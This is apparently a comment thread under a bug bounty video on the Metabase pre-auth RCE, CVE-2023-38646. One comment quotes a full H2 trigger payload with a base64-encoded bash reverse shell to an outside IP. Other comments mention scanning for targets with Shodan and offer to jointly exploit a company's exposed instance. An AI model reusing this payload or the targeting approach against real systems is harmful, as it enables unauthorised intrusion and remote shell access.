One day I'm gonna have the same skills as you, great job mate!!
Great video thanks for sharing
Awesome man! Keep it up. Keep up the good work!
Appreciate it!
Metabase CVE 2023 awesome 🙌
Keep it up bro, doing great work by teaching others ❤ love from Ronin
Thanks pro!
Could you please paste the full POST request on the setup/validate endpoint which you have used?
Perhaps you can join the channel
@abhishekmorla1
I always got the below error when trying to execute the command. Could you please help? Or can I consider this as enough proof of concept for the vulnerability?
"Error creating or initializing trigger \"PWNSHELL\" object, class \"..source..\", cause: \"org.h2.message.DbException: Syntax error in SQL statement \"\"//javascript
java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')
\"\" [42000-197]\"; see root cause for details; SQL statement:
SET TRACE_LEVEL_SYSTEM_OUT 1;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')
$$--=x [90043-197]"
Hats off Bro!!!
Is that all your findings that you upload?
No but most of them
How did you get these API endpoints with this JSON parameter and know it will be vulnerable to RCE?!
History
@abhishekmorla1 History? Like the school subject? What history?
Edit: I know nothing about Metabase so I guess to understand the payload I gotta understand Metabase
@Noctuu bro, Burp history
@abhishekmorla1 and the payload too I guess? Or was my edit right?
Solid af
Very cool.
nice finding
I'm a beginner. If I'm not wrong, I understand you found SSRF and u escalated it to RCE by accessing some metadata or sensitive files, and u got RCE? What advice would you give me?
Bro, if I'm not wrong, he actually finds some kind of newly discovered (or old, idk) CVE posted on Exploit DB or other websites, and then searches for those vulnerable services. But I have some questions as well, like whether he only does this to websites that are subscribed to bug bounty services.
join to learn more ruclips.net/channel/UC9IAh1JN4lhSVz193GvZVZgjoin
How to find these kinds of bugs? Can you make a proper tutorial on how to find this type of RCE?
sure
Great video, but it should be watched at x0.50 speed
perfect+++
How do you find targets for such bugs? Any methodology you follow?
I use Shodan
@abhishekmorla1 I'll do the same concept on a web-application-based sign-in page? It'll work?
Bro, help me exploit this
We can share the bounty
Found Metabase in a billion-dollar company
join the channel ruclips.net/channel/UC9IAh1JN4lhSVz193GvZVZgjoin
@abhishekmorla1 I don't think there's any need to join the channel
If u wanna hunt that CVE together then reply
Bro, informative video. How did you learn this type of bug?
From CVEs
Cool one... May I get this exploit for MySQL and Postgres?
And why did you add some extra space in the base64-encoded one? Still confused there
To remove the equal
@abhishekmorla1 yeah, I saw, but why did u do that? It's already encoded, right? I have a doubt about this
🎉🎉🎉❤❤❤
Bro, ur just an amazing hacker. Do u guess the endpoint on all requests?
Naah bro..😅
@abhishekmorla1 Then why do u always copy the endpoint and paste it directly into Burp? I really need to know, bro
Bro, study the CVE I mentioned
Congratulations, found the video from WhatsApp
May I know what kind of laptop you would recommend for bug bounty programs?
It's CVE-2023-38646
Don't copy-paste the title
@abhishekmorla1 it wasn't there before I commented
How to find this program? I think it's not a HackerOne program, right?
Nope, it's not H1, bro